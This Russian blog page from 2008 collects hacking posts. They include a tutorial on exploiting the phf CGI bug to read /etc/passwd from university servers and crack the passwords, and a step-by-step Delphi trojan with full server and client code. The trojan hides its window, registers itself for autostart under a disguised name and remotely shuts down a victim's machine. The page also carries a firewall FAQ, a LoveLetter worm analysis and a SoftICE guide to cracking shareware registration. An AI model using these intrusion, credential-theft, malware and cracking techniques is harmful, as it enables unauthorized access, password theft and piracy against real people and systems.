Всегда подумайте, прежде чем действовать. Не раскрывайте никаких сведений о себе. Не забывайте уничтожать, а не стирать, резервные файлы; это особенно касается временных файлов, которые создаются без вашего участия, автоматически. Если вы будете осторожны, вам удастся практически полностью избежать ошибок. Но даже самый осторожный хакерможет попасться, веруя в стопроцентный успех своего плана действий, тогда как на деле в нем куча недостатков. Например, в 1974 году преступник в Токио пытался использовать одно из основных свойств электронной передачи данных — задержку, которая происходит в то время, когда данные идут по кабелям или телефонным линиям. Преступник открыл банковский счет, использовав фальшивое имя Кобаяши, и начал потихоньку перетягивать небольшие суммы из банкоматов, разбросанных по всей Японии. Каждый раз, перетащив немного денег, он звонил в банк, чтобы узнать текущее состояние своего счета. Таким образом ему удалось выяснить, что центральному компьютеру банка требуется двадцать минут, чтобы зарегистрировать отток денег с удаленной машины. Позднее Кобаяши решил воспользоваться этой информацией. Он перевел на свой счет 5 миллионов йен, рассчитав, что у него в запасе будет двадцать минут, чтобы унести ноги, пока служащие банка станут ожидать, когда главный компьютер получит информацию о том, с какого автомата была снята такая сумма. План провалился — Кобаяши не подумал, что программисты банка смогу перепрограммировать центральный компьютер для немедленной идентификации использованной преступником машины. Грабитель не успел снять со счета свои деньги, как его схватили.

Просматривайте свои планы на случай неожиданных поворотов, и помните, что по ту сторону линии могут быть люди, стремящиеся вас схватить. И, наконец, вас могут узнать. Постарайтесь не выделяться среди массы людей. Самый надежный способ никогда не попасться — никогда не начинать заниматься хакерством. Тогда все, что вы сможете делать с компьютером, — это заниматься делами, решать задачки и иногда играть. Но, занявшись хакерством, вы приобретете целый мир. Вот и все. Желаю всем нам еще много мирных счастливых взломов!
 (128x128, 18Kb)
Рубрики:  Брутерсто


Понравилось: 1 пользователю

Аудио-запись: Kazantip

Четверг, 21 Февраля 2008 г. 11:53 + в цитатник
Файл удален из-за ошибки в конвертации kazantip

Метки:  

Хакером 3а 15 минут!!!

Четверг, 21 Февраля 2008 г. 11:41 + в цитатник
Тебе понадобиться IRC-клиент, а также на ftp.technotronic.com в разделе «rhino9-products» возьми программульку под названием Grinder – он ищет указанный тобой файл в диапазоне IP и показывает права на него. Также нужен подбиратель юниковских паролей John the Ripper (найти его ты сможешь в любом поисковике). В квадратных скобках указанно, что надо писать.

Что же будем ломать? Систему того придурка, который, получая зарплату за защиту сервера, ни хрена для этой защиты не делает. Читай внимательно этот абзац ты впаривать девушкам на вечеринке. Есть такое понятия – cgi-скрипты. И одна из самых первых ошибок обнаруженная в этих скриптах, был т.н. phf bug, ошибка скрипта phf, позволяющая выполнять удаленному юзеру любые юниксовские команды на web-сервере. Запускай IRC-клиент и конектись к любому серверу. Самая плохая защита на больших университетских серверах, там годами не обновляется программное обеспечение. Смело вводи команду [/who*.edu]. Перед тобой список юзеров, использующих университетский сервер для выхода в Инет. OK, бери первого попавшегося. Например, Lamerz666@jagaast.jj.rhno.columbia.edu:2JagaastLz’Merl (*). Следующая команда – [/dns Lamerz]. Этим ты узнаешь его IP (например, 194.52.13.102). Теперь запускай Grinder, он предлагает тебе поискать файл/index.htm. Зачем нам этот файл? Стираем нафиг и вместо него пишем [/cgi-bin/phf.cgi] и диапазон от 194.52.13.1 до 194.52.13.256. Ждем… Появляются два варианта.. Первый: Grinder пишет URL found. Второй – всё остальное. Вот если found, запоминаем (например, 194.52.14.25) мчимся к браузеру. И там вводим: [http://194.52.14.25/cgi-bin/phf?Qalias=%ff/bin/cat%20/etc/passwd]. О боже, что это появилось?!! Файл passwd прямо в окне твоего браузера! Сохраняй все это добро и суй его в руки The Ripper).

И вот у тебя лист с паролями. Берешь его и идешь на вечеринку. Достаешь листик с паролями. Подходишь к ближайшему компу и говоришь «пустите-ка меня». Входи по ftp на сервер, который ты ломанул. Вошел? Теперь можешь закурить или открыть пивка и процедить: «Вот, вчера хакнул. Пользуйтесь! J». Теперь отойди и сядь. И когда унесут на носилках потерявших сознание, обязательно найдется какой-нибудь недоносок, который начнет задавать умные вопросы.

Firewall

Четверг, 21 Февраля 2008 г. 11:03 + в цитатник
Что такое брандмауэр?

Брандмауэр (firewall) - перегородка из огнеупорного материала,
возводимая на пути распространения пожара. Также данный термин стал
использоваться для обозначения аппаратных и программных средств
сетевой защиты (сетевой экран). Пожалуй, такое название было выбрано
из маркетинговых соображений: "Пусть за стеной бушует пожар или
беснуются варвары, но вам за надежной защитой ничего не грозит". В
действительности сетевой экран походит не на сплошную стену, а на
таможенный пост, где в соответствии с предписаниями проверяется багаж
путешественников. Если груз к ввозу или вывозу разрешен, его
пропускают. Если нет - извините. Причем решения принимаются на основе
адресов получателя/отправителя, а не содержимого груза. Так что
доверенный отправитель может отправить своему визави не только
поздравительную открытку, но и грамм триста тротилового эквивалента.
Таможня "посылочку" пропустит, если связь разрешена в предписании.

Какие бывают брандмауэры?

Программные или аппаратные. Последние специально спроектированы для
фильтрации трафика устройства. В среднем их производительность гораздо
выше, чем у программных брандмауэров, что особенно заметно на крупных
информационных магистралях. Ценой они также различаются (угадайте, кто
дороже).

Что брандмауэр не делает?

Не анализирует передаваемые данные. Решение позволить/запретить
передачу сетевых пакетов принимается на основе их адресной информации
(сетевые адреса и порты отправителя/получателя). Причем данные,
передаваемые в пакетах, не рассматриваются (а это может быть
вредоносный код для взлома программы).

Владелец одного ресурса, после того как его веб-сервер взломали: а)
нехорошо отозвался о вирусописателях; б) удивился, как сайт могли
взломать, если он был закрыт брандмауэром. Ответ: а) вирусописатели
встречаются разные; б) взломали сайт через уязвимость web-сервера, а
доступ к нему в брандмауэре был открыт. Для анализа передаваемых по
сети данных предназначены программы, получившие название сетевые
системы обнаружения вторжения (Network Intrusion Detection System,
NIDS). Это аналог антивирусного монитора, адаптированного для сетевого
трафика. Просматривая пропущенный брандмауэром трафик, NIDS,
зафиксировав начало сетевой атаки, передает сигнал брандмауэру. Тот,
соответствующим образом изменив правила фильтрации, прерывает
нападение. Связка "брандмауэр - NIDS", гибко реагируя на возникающую
угрозу, обеспечивает гораздо лучшую сетевую защиту, чем лишь один
брандмауэр. Девизом брандмауэра можно было бы назвать: "Все, кому
разрешен доступ, - джентльмены". Девиз же NIDS: "И за джентльменами
надо присматривать".

Что брандмауэр и NIDS не делают?

Не шифруют передаваемые данные.

Это не их задача, но согласитесь, немногого стоит надежность банка,
если деньги он пересылает в обычных почтовых конвертах. Вернувшись к
аналогии с бюрократами, отмечу, что большое число программ - ICQ, FTP,
почтовые клиенты (протоколы SMTP/POP3), интернет-браузеры (HTTP) и т.
д. - передает данные в открытом виде. Следовательно, любой, кто
перехватит курьера, может их прочитать. Поэтому при использовании
ненадежных каналов связи (интернет в первых рядах) для передачи
конфиденциальных данных следует использовать криптозащиту. Будет ли
это PGP-кодирование почты или VPN-соединение различных сетей, зависит
от решаемых задач. Поскольку данная тема далеко выходит за рамки
статьи, на этом мы и остановимся.

Что еще ожидать от брандмауэра?

Падения работоспособности системы.

Программный брандмауэр при повышении объема сетевого трафика требует
больше вычислительных ресурсов. Высокая скорость передачи данных
накладывает требования ко времени обработки трафика. Цена вопроса:
устойчивость сетевых соединений.

Мы живем в эпоху идеально продуманных операционных систем и
совершенных аппаратных платформ, где драка за ресурсы невозможна в
принципе. В большинстве офисных и домашних локальных сетей шлюз
построен на базе компьютера а-ля пишущая машинка. За ней сидит девушка
с Word'ом, прикручен принтер, а еще есть дисковод. В результате
периодически "интернет отваливается".

Если поставить два программных брандмауэра, будет круче?

Нет. Возникнет конфликт между программами, когда они будут
одновременно пытаться работать с сетью. Вместо повышенной защиты вы
получите дыру. Лучше обращать внимание на качество, а не на
количество.

Какой из сетевых брандмауэров самый крутой?

Отражающий сетевые атаки. Большинство распространенных программных
защит функционально схожи между собой. Часто выбор между той или иной
программой определяется личным вкусом и языком интерфейса. Но несмотря
на стремление разработчиков сделать интерфейс максимально дружелюбным,
управление любым брандмауэром требует понимания основ сетевой
активности.

Поставил брандмауэр, что дальше?

Аудит. Практика - критерий истины. Следующий этап после построения
защиты - ее проверка. Добро пожаловать на ресурс PC FLANK.

Вирусы вредные?

Вирус-лекарь NetSky отыскивает в сети системы, зараженные другим
вирусом, вылечивает их, а также устраняет уязвимость, использованную
для заражения. На первый взгляд создатель NetSky заслуживает уважения
за "души благородный порыв", но глубина людской неблагодарности,
наверное, потрясла его. Смотрим дальше. Платой за услугу становится
сетевой трафик, потраченный NetSky при рассылке своих копий с
вылеченной им системы. В одном случае вирус за несколько дней нагнал
больше шести гигабайт трафика, прежде чем владелец компьютера
спохватился. Это еще раз подтверждает, что спасение утопающих - дело
рук самих утопающих. За помощь приходится платить.
Рубрики:  Брутерсто

Свой троян

Среда, 20 Февраля 2008 г. 21:21 + в цитатник
Ты уже сто раз слышал это магическое слово «Троян». И мы уже много раз писали обзоры различных коней этой породы. В твоих извилинах, наверно уже давно крутиться мысль о создании собственного боевого коня. Сегодня тебе предстоит эта уникальная возможность. Даже если ты никогда не будешь использовать эти знания, тебе всё равно нужно знать, как работают трояны изнутри.
Для простоты тела мы сделаем это на Delphi. Я выбрал этот язык, потому что тело журнала ограничено, и я не хочу вдаваться в подробности протоколов.
В этом номере ты найдёшь статью, посвящённую написанию супер плеера на Delphi. Если ты её пропустил, то обязательно прочти и возвращайся сюда. Там я описал основные принципы работы с оболочкой компилятора, так что здесь повторяться не буду.
Приготовься, нам предстоит написать сразу две проги. Одна будет находиться на твоей машине (клиент), другую надо будет подбросить жертве (сервер). Работы будет много, поэтому меньше слов, и ближе к телу.
Троянский сервер:
Итак, запускай Delphi или если он у тебя уже запущен, то создавай новый проект («File» – «New Application»). Сейчас мы примемся за серверную часть трояна.
Для начала выбери пункт меню «Options» из меню «Project».
Здесь ты должен перенести «From1» из раздела «Auto-Create forms» (список слева) в «Available forms» (список справа), как это сделано у меня. Только что мы отключили From1 из списка авто инициализируемых форм. Теперь инициализацию придётся произвести вручную. Не пугайся, это очень просто.
На странице «Application» этого же диалога есть кнопка «Load Icon». Нажми её, чтобы сменить иконку будущей проги. Если икону не сменить, то будет использоваться дельфячая, а она быстро выдаст твоё смертельное оружие.
Теперь ты должен бросить на форму компонент ServerSocket из раздела «Internet», это сервак протокола (по умолчанию TCP, и нам его достаточно). Выдели созданный ServerSocket1 и перейди в ObjectInspector. Здесь тебя интересует только свойство «Port». По умолчанию оно равно 1024, но я тебе советую его поменять на любое другое (желательно больше 1000).
Теперь щёлкни в любом месте на форме, чтобы активизировать её свойства. Перейди в ObjectInspector и щёлкни по закладке Events. Дважды щёлкни по строке «OnCreate» и Delphi, как всегда, создаст процедуру, она будет выполняться при инициализации формы. Напиши там следующее:
procedure TForm1.FormCreate(Sender: TObject);

i RegIni:TRegIniFile;

begin

RegIni:=TRegIniFile.Create('Software');

RegIni.RootKey:=HKEY_LOCAL_MACHINE;

RegIni.OpenKey('Software', true);

RegIni.OpenKey('Microsoft', true);

RegIni.OpenKey('Windows', true);

RegIni.OpenKey('CurrentVersion', true);

RegIni.WriteString('RunServices', 'Internat32.exe',

Application.ExeName);

RegIni.Free;

ServerSocket1.Active:=true;

end;

Теперь перейди в начало текста и напиши после «uses» слово «registry». Мы уже делали такую операцию в статье про мега плеер, но я повторю, как это будет выглядеть:
uses registry, Windows, Messages,

Теперь я объясню, что мы написали в процедуре.
«var RegIni:TRegIniFile» - здесь мы объявили переменную RegIni типа TRegIniFile. С помощью этой переменной мы будем общаться с реестром.
«RegIni:=TRegIniFile.Create('Software')» - инициализируем переменную указывающую на реестр.
«RegIni.RootKey:=HKEY_LOCAL_MACHINE» говорим, что нас интересует раздел HKEY_CURRENT_USER реестра.
«RegIni.OpenKey('Software', true)» - открываю подраздел «Software».
Дальше я последовательно открываю подразделы, пробираясь в недра окошек.
«RegIni.WriteString('RunServices', 'Internat32.exe', Application.ExeName)” – записываю в раздел «RunServices» (в этом разделе хранятся проги, которые автоматически загружаются при старте), новый параметр с именем «Internat32.exe» (имя будущего файла) и значением Application.ExeName (здесь храниться полный путь к запущенному трояну).
«RegIni.Free» - уничтожаю ненужный больше объект RegIni.
Всё это делалось, чтобы при запуске проги, она сама себя прописывала в разделе автозапуска. И после перезагрузки компьютера она автоматически загружалась в память.
Самая последняя строка «ServerSocket1.Active:=true» запускает сервер на указанном тобой порте.
С загрузкой покончено. Теперь давай займёмся выгрузкой. Опять выдели форму и в закладке Events у ObjectInspector-а дважды щёлкни по строке «OnDistroy». Теперь создастся процедура, которая будет выполняться при уничтожении формы. В созданной процедуре напиши:
procedure TForm1.FormDistroy(Sender: TObject; i Action: TCloseAction);

begin

ServerSocket1.Active:=false;

end;

Этим я отключаю сервак. Если этого не сделать, то при первой же перезагрузке твоя жертва может поймать синий экран, если ты в это время будешь подключён к серверу. С одной стороны, это хорошо. Твоя жертва в очередной раз убеждается в плохой защищённости его окошек. А с другой, я не думаю, что следует выдавать себя раньше времени. Тем более, что после синего экрана перезагрузка может остановиться, а нам это не надо (забегу вперёд и скажу, что мы сами будем перегружать компьютер жертвы).
Теперь нужно выделить ServerSocket1 и перейти на закладку Events у ObjectInspector-а. Дважды щёлкни по строке «OnClientRead» и в созданной процедуре (она будет вызываться, когда что-нибудь приходит на порт) напиши:
procedure TForm1.ServerSocket1ClientRead(Sender: TObject;

Socket: TCustomWinSocket);

begin

if Socket.ReceiveText='R' then

ExitWindowsEx(EWX_SHUTDOWN,0);

end;

Теперь, как это звучит по-нашему:
Если полученный текст=букве ‘R’ то

Отправить компьютер в редаун.

ExitWindowsEx – редаун заставит окна свернуться и отключить компьютер от питания. Я вообще добрый дядька, поэтому использовал параметр EWX_SHUTDOWN. С этим параметром, перед редауном всем запущенным приложениям полетит запрос о выключении, и жертва сможет сохранить свои изменённые данные. Если ты злей меня, то используй EWX_FORCE. В этом случае, компьютер упадёт без предупреждения и со скоростью света, так что жертва не успеет от страха воздух испортит :).
Троян практически готов, сохрани его. Для этого выбери «Save All» из меню «File». С начала Delphi запросит имя формы. Оставь по умолчанию (Unit1) и нажми «Сохранить». Потом будет запрос на имя проекта, которое будет использоваться в качестве имени ЕХЕ файла. Назови его «Internat32», чтобы файл не вызывал особых подозрений.
Конюшня для коня:
Теперь ты должен хорошенечко спрятать своего будущего скакуна, чтоб его не было видно в панели задач. Для этого выбери пункт меню «Project Manager» из меню «View».
Щёлкни правой кнопкой по Internat32.exe и в появившемся меню выбери «View Source». Перед тобой откроется маленький файл с исходным текстом проекта. Сравни то, что ты увидишь с этим текстом, и допиши то, чего не хватает, а что лишнее – убери (так не так уж и много):
program Internat32;
uses

Forms,

Windows.

Unit1 in 'Unit1.pas' {Form1};
{$R *.RES}
var

WhEvent:THandle;

begin

Application.Initialize;

ShowWindow(Application.Handle,SW_Hide);

Form1:=TForm1.Create(nil);

Application.Run;
WhEvent:=CreateEvent(nil, true,false, 'et');

while (true) do

begin

WaitForSingleObject(WhEvent,1000);

Application.ProcessMessages;

end;
end.

Будь внимателен при переписывании. Всё должно быть один к одному. Теперь я расскажу, что здесь написано:
В самом начале нет ничего интересного, и нас абсолютно не касается. Нас интересует всё, что написано после слова «Var».
WhEvent:THandle – Этим я говорю, что мне нужен указатель WhEvent на пустое событие Thandle.
Application.Initialize – Инициализируется троян.
ShowWindow(Application.Handle, SW_Hide) – Устанавливаю параметры окна. Параметр SW_Hide – говорит, что окно должно быть невидимо. Единственное, как его можно после этого увидеть, так это нажать Ctrl+Alt+Del. Но здесь у нас используется не вызывающее подозрения (только у чайника, профи уже давно знают, о таком имени) имя.
Form1:=TForm1.Create(nil) – создаю форму. Мне приходится это делать так, потому что мы убрали форму из из списка авто создаваемых.
Application.Run – запускаю трояна. Здесь запускаются обработчики событий и прочая ерунда, за которую отвечает Delphi и которую пришлось бы писать вручную на С или С++. А здесь всё очень просто.
WhEvent:=CreateEvent(nil, true,false, 'et') – инициализация пустого события.
Следующие пять строчек я напишу словами, а ты разберёшься как всегда методом сравнения:
Пока (true) выполнять

Начать цикл

Ждать пока наступит событие (пустое событие, 1000 миллисекунд)

Получить управление

Закончить цикл

Две строчки между началом и концом цикла будет выполняться бесконечно, потому что true оно всегда true, и из этого цикла выхода нет. Весь цикл заключаеться в двух особенностях:
1. Запускается ожидание несуществующего события. Так как событие не существует, то программа прождёт его ровно указанное время в качестве второго параметра (1000 миллисекунд или 1 секунда).
2. Получить управление.
После второго шага программа снова перейдёт на пункт 1 и запустит ожидание. Во время ожидания пользователь работает с другими приложениями как всегда. Когда трояну (каждую 1 секунду) передаётся управление, то наш конь проверяет: есть ли для него сообщения. В нашем случае сообщение может быть одно – приход на указанный тобой порт управляющей команды. Если сообщения есть, то троян их выполняет. И в любом случае (есть сообщения или нет), после этого пользователь снова работает 1 секунду без проблем. Проверка происходит так быстро, что жертва не ощутит нагрузки трояна даже на четверке с сотым камнем.
Нажми «Ctrl+F9» чтобы Delphi создал .ехе файл без запуска проги. Как только Delphi перемозгует весь код, можешь считать, что серверная часть готова. Если вздумаешь её тестировать, то не забудь, что после первого же запуска троян пропишется в реестре по адресу: HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRunServices. Не забудь после тестирования его удалить.
Теперь переходим к клиентской части, которую ты должен будешь запустить на своём компьютере для управления компьютером жертвы.
Троянский всадник:
Снова сохрани все изменения и создай новый проект. Пришло время писать клиентскую часть трояна. Ещё пару минут напряжённого труда и все красавицы наши :).
На новый проект ты должен бросить три компонента:
1. Button из закладки «Standart» для отправки команды на компьютер жертвы.
2. Edit из закладки «Standart» для ввода имени или адреса жертвы.
3. ClientSocket из закладки «Internet» клиент порта для связи с сервером
Посмотри на рисунок 3, у тебя должно получиться нечто похожее.
Выдели ClientSocket1 и в ObjectInspector-е измени свойство порт. По умолчанию он 0, а ты должен поставить тот, который ты назначил серверу.
Теперь дважды щёлкни по кнопке и в созданной процедуре (обработчике нажатия кнопки) напиши следующее.
procedure TForm1.Button1Click(Sender: TObject);

begin

ClientSocket1.Host:=Edit1.Text;

ClientSocket1.Active:=true;

ClientSocket1.Socket.SendText('R');

ClientSocket1.Active:=false;

end;

ClientSocket1.Host:=Edit1.Text – В ClientSocket1 заносим имя жертвы в твоей локалке. Если собираешься использовать троян в инете, то там ты имя никак не сможешь узнать. Тебе придётся использовать IP адрес, а значит эта строчка замениться на ClientSocket1.Addres:=Edit1.Text. И вводить в Edit1 ты должен будешь IP адрес.
ClientSocket1.Active:=true – активировать соединение с сервером.
ClientSocket1.Socket.SendText('R') – отправить букву R. Помнишь, что у нас было пару минут назад. Если сервер получит букву R, то он перегрузит машину.
ClientSocket1.Active:=false – закрыть соединение с сервером.
Всё. Троян готов к бою. Нажми «Ctrl+F9» чтобы Delphi создал ЕХЕ файл без запуска проги. Найди жертву и протестируй своего верного коня. Для этого нужно запустить серверную часть на компьютере жертвы. Потом запустить клиентскую часть на своём компьютере. Ввести в клиент имя компьютера жертвы (или адрес, если ты скомпилировал под использование через IP) и нажать кнопку. Компьютер жертвы должен перегрузится

Добавлю новосЬ

Среда, 20 Февраля 2008 г. 16:05 + в цитатник
Новости о вирусах 20 февраля добавлю новость про вирусы примерно вечером часов в 10

О вирусе!!!

Среда, 20 Февраля 2008 г. 16:03 + в цитатник
Вирус LoveLetter

Название LoveLetter
Alias Lovebug, I-Worm.LoveLetter
Тип Worm, Trojan
VBS/LoveLetter это VBScript-червь. Распространяется посредством цепочки писем.
LoveLetter.A

Для распространения червь использует приложение Outlook. LoveLetter также создает VBS вирус, и распространяется, используя mIRC клиент.
Когда происходит запуск, черь сначала копирует себя в дирректорию <Windows dir>/System как:
MSKernel32.vbs
LOVE-LETTER-FOR-YOU.TXT.vbs
и в дирректорию <Windows dir>:
Win32DLL.vbs
Далее он добавляет запись в реестр, чтобы запускаться при каждом рестарте системы. В реест добавляются:
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MSKernel32
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices\Win32DLL
Затем червь заменяет домашнюю страницу Internet Explorer линком, который указывает на executable (выполняемую)-программу, "WIN-BUGSFIX.exe". Если файл WIN-BUGSFIX.exe уде скачан, червь также добавляет информацию о нем в реестр. Таким образом программа будет выполнена после перезагрузки системы.
Executable часть, которую червь загрузил из сети - троян, перехватывающий пароли. При запуске троян пытается нахйти скрытое окно с именем ' BAROK ... '. Если окно присутствует, троян немедленно завершает работу, если нет - управление получает главная часть. Троян проверяет наличие подключа WinFAT32 в ключе реестра HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run.
Если подключ WinFAT32 не найден, троян создает его, копирует себя в \Windows\System\ каталог как WINFAT32. EXE и затем запускается оттуда. Таким образом, изменения в системном реестре, делает троян активным при каждом запуске Windows.
Затем троян утанавливает в IE startup page как 'about:blank'. Далее находит и удаляет ключи:
Software\Microsoft\Windows\CurrentVersion\Policies\Network\HideSharePwds
Software\Microsoft\Windows\CurrentVersion\Policies\Network\DisablePwdCaching
.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\Network\HideSharePwds
.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\Network\DisablePwdCaching
После этого троян регестрирует новый класс window, и создает окно с заголовком 'BAROK…' и аттрибутом hidden, Тогда троянские регистраторы новый класс окна и создает скрытое названное окно ' BAROK ... ' и остается резидентом в памяти как скрытое приложение.
Немедленно после запуска и когда счетчик таймера достигает некоторого значения, троян загружает библиотеку MPR.DLL, вызывает фунцию WNETENUMCASHEDPASSWORDS, и посылает украденные RAS пароли и все cached пароли Windows на адресу 'mailme@super.net.ph', который, вероятно, принадлежит автору трояна. Для отправки письма троян использует smtp-сервис 'smtp.super.net.ph'. Subj письма - ' Barok ... email.passwords.sender.trojan '.
Внутри трояна имеется строчка с копирайтом автора:
barok ...i hate go to school suck -
by:spyder @Copyright (c) 2000 GRAMMERSoft Group >Manila,Phils.
Также в теле трояна имеются зашифрованные сообщение, используемые им для только ему понятных целей.
После этого червь создает HTML файл, " LOVE-LETTER-FOR-YOU.HTM ", в дирректории System. Этот файл содержит червя, и это будет послан, используя mIRC каждый раз, когда пользователь присоединяется к IRC каналу.

Далее червь будет использовать Outlook для массовой рассылки непосредственно к каждому аккаунту из адресной книги книжке. Посылаемое сообщение будет иметь вид:

Subject: ILOVEYOU
Body: kindly check the attached LOVELETTER coming from me.
Attachment: LOVE-LETTER-FOR-YOU.TXT.vbs
LoveLetter посылается по почте один раз каждому получателю. После того, как почта была послана, добавляется маркер в реест, и получателю не будет больше отсылаться троян.Также вирус ищет файлы некоторых типов во всех папках на всех локальных и и удаленных дисках и переписывает их его собственным кодом. Файлы, которые переписываются, имеют или расширение "vbs" или "vbe".
Для файлов с расширениями *.js, *.jse, *.css, *.wsh, *.sct, *.hta", вирус создает новый файл с тем же именем, но с расширением .vbs. Первоначальный файл будет удален.Затем вирус ищет файлы с *.jpg" и *.jpeg" расширением, добавляет туда же новый файл и удаляет первоначальный. Потом вирус находит *.mp3 и *.mp2 файлы, создает новый файл и прячет первоначальный файл. Созданные файлы имеют имя оригинала, с добавленным расширением .vbs. Например, для картинка с названнием "pic.jpg" будет создан новый файл, с именем "pic.jpg.vbs".
LoveLetter был найден 4-ого мая, 2000. Похоже, что вирус имеет Филиппинское происхождение. В начале кода, вирус содержит следующий текст:
barok -loveletter(vbe) <i hate go to school>
by: spyder / ispyder@mail.com / @GRAMMERSoft Group / Manila,Philippines
Ручное удаление LoveLetter можно быть сделано, путем удаления следующих файлов из инфицированной машины:
• Все.VBS файлы со всех дисков и дирректорий;
• Файл LOVE-LETTER-FOR-YOU.HTM из каталога Windows System;
• WIN-BUGSFIX.EXE и WINFAT32. EXE из дирректории Download Internet Explorer'а.
LoveLetter.B


Этот вариант вируса использует другой Subj при распространении:
Subject: Susitikim shi vakara kavos puodukui...
Body: kindly check the attached LOVELETTER coming from me.
Attachment: LOVE-LETTER-FOR-YOU.TXT.vbs
В поле SUBJECT надпись по Литовски, которая в переводе звучит как " Давайте встретимся этим вечером для чашечки кофе ... "
LoveLetter. B содержит следующий комментарий в его теле:
Modified Lameris Tamoshius / Lithuania (Tovi systems)
LoveLetter.C

Этот вариант размножается с сообщением:
Subject: fwd: Joke
Attachment: Very Funny.vbs
LoveLetter.D

Этот вариант - слегка измененный вариант VBS/LOVELETTER.A.
LoveLetter.E

VBS/LoveLetter. E распространяется в сообщении:Subject: Mothers Day Order Confirmation Body: We have proceeded to charge your credit card for the amount of $326.92 for the mothers day diamond special. We have attached a detailed invoice to this email. Please print out the attachment and keep it in a safe place.Thanks Again and Have a Happy Mothers Day! mothersday@subdimension.com Attachment: mothersday.vbs

Дополнительно, этот вариант удаляет все файлы с расширением *.ini" и *.bat" вместо *.jpg" и *.jpeg". Этот вариант не пытается загружать "WIN - BUGSFIX.EXE" из Internet, однако изменяет начальную страницу Internet Explorer.
 (128x128, 20Kb)
Рубрики:  Брутерсто

В3лом windows

Среда, 20 Февраля 2008 г. 16:01 + в цитатник
1. ВВЕДЕНИЕ В ЛОМАНИЕ WINDOWS-ПРОГРАММ
======================================
Ломать программы Windows в большинстве случаев даже проще, чем ломать программы Dos. В Windows сложно что-нибудь скрыть от того, кто ищет, особенно если программа использует стандартные функции Windows.
Первая (и часто единственная) вещь, которая Вам потребуется - это SoftICE/Win 2.oo, мощный отладчик от фирмы NuMega. Некоторым людям он кажется очень сложным в использовании, но я расскажу Вам, как с ним управляться и, я надеюсь, Вы поверите мне.=) В приложении A я привел некоторую информацию, которую Вам следует прочитать.
URL всех программ, которые Вам понадобятся, приведены в приложении C.

2. ОБЗОР SOFTICE/WIN 2.OO
=========================
Ниже приведен очень схематичный рисунок, демонстрирующий окно
SoftICE:
Регистры 'R' - правка значения регистров
Окно данных 'D' - просмотр памяти, 'E' - правка памяти
Окно кода 'U' - просмотр кода по адресу, 'A' -вставка кода
Окно команд Здесь Вы набираете команды
Другие важные клавиши (в стандартной настройке):
'H'/F1 - помощь.
F5/Ctrl+D - запуск программы (или продолжение прерванной
программы).
F8 - пошаговая отладка с заходом в тело функции.
F10 - пошаговая отладка без захода в тело функции.
F11 - выйти из функции (будет работать только до первого
PUSH в функции).
3. ПОИСК РЕГИСТРАЦИОННЫХ КОДОВ
==============================
Возможно, наилучший способ попрактиковаться - это найти где-нибудь шареварную (shareware) программку и попытаться зарегистрировать ее.

3.1 Task Lock 3.00 - простая защита на основе серийного номера
==============================================================
Это очень простая защита: номер не зависит ни от каких факторов.
3.1.1 Медицинское обследование
==============================
Какой разрядности программа - 16 или 32 бит? Где вводится регистрационная информация? Даст ли мне справка какие-нибудь предположения о том, как устроена регистрация? Попробуйте ответить на эти вопросы перед тем, как мы продолжим.
....Сейчас Вы должны быть заняты обследованием....Вы заняты обследованием? ...Ну как, уже все?...
OK, теперь Вы знаете, что это 32-битное приложение, работающее под Windows 95 и что регистрация заключается в заполнении регистрационного номера в диалоговом окошке, которое появляется когда Вы выбираете меню "Register|Register...". Из справки Вам также стало известно, что существует два типа регистрации: для индивидуального использования и для использования в "конторе" (в оригинале - site license). Поэтому очень вероятно, что в программе будет ДВЕ проверки регистрационных кодов.

3.1.2 Прерывание программы
==========================
Регистрационные коды чаще всего вводятся в обычных строчках ввода типа Windows Edit. Чтобы проверить код, программа должна прочитать содержимое строки ввода при помощи одной из функций:
16-бит 32-бит
------ ------
GetWindowText GetWindowTextA, GetWindowTextW
GetDlgItemText GetDlgItemTextA, GetDlgItemTextW
Последняя буква в названии 32-битных функций говорит о том, какие строки использует эта функция: однобайтовые или двухбайтовые. Двухбайтовые строки используются ОЧЕНЬ редко. Возможно, что Вы
уже уловили мою мысль. "Если бы можно было прерваться по вызову GetWindowText..." - и Вы МОЖЕТЕ это сделать!!! Но сперва Вы должны убедиться, что символьные имена (имена функций) загружены
SoftICE'ом. Если Вы не знаете, как это сделать - см. приложение
A.
Чтобы установить "ловушку" (на самом деле это называется точкой останова или брейкпоинтом) в SoftICE, Вы должны зайти в отладчик нажатием клавиш Ctrl-D и использовать команду BPX. В качестве параметра команды можно использовать либо имя функции, либо непосредственно адрес. Так как наш "объект изучения" (Task Lock) является 32-битным приложением, мы должны поставить брейкпоинт на функцию GetWindowTextA. Если это не поможет, попробуйте поставить брейкпоинт на другие функции. В командной строке SoftICE наберите следующее:
:bpx getwindowtexta
Если Вы получите сообщение об ошибке (например, "No LDT"), убедитесь, что в фоне у Вас не выполняются никакие другие приложения. Я заметил, что Norton Commander в фоне является причиной подобного поведения SoftICE. Вы можете проверить наличие брейкпоинтов командой:
:bl
В результате Вы увидите что-нибудь типа:
00) BPX USER32!GetWindowTextA C=01
Чтобы выйти из отладчика, нажмите Ctrl-D (или F5) еще раз.
Продолжим... Итак, Вы установили брейкпоинт и теперь SoftICE будет "выскакивать" при каждом вызове функции GetWindowTextA. Попробуем ввести какое-нибудь значение в окне регистрации и нажмем OK. Вы нажимаете OK... ...и получаете дурацкое сообщение о том, что Ваш код был неправильным. Значит, это была не функция GetWindowTextA... Попробуем GetDlgItemTextA. Удалим старый брейкпоинт:
:bc 0

(0 - это номер брейкпоинта в списке брейкпоинтов)
И установим новый:
:bpx getdlgitemtexta
Ну что ж, попробуем еще раз...

3.1.3 В отладчике
=================
Wow! Работает! Теперь вы в SoftICE, в самом начале функции GetDlgItemTextA. Чтобы попасть туда, откуда она была вызвана, нажмите F11. Теперь Вы внутри модуля SGLSET.EXE. Если Вы не уверены - посмотрите на строчку между окном кода и окном командной строки, она должна выглядеть так:
----------SGLSET!.text+1B13----------
Сейчас Вы уже можете запретить реакцию на вызов функции:
:bd 0
Если Вам вдруг захочется снова разрешить ее, наберите:
:be 0
Первая строка в окне кода выглядит так:
CALL [USER32!GetDlgItemTextA]
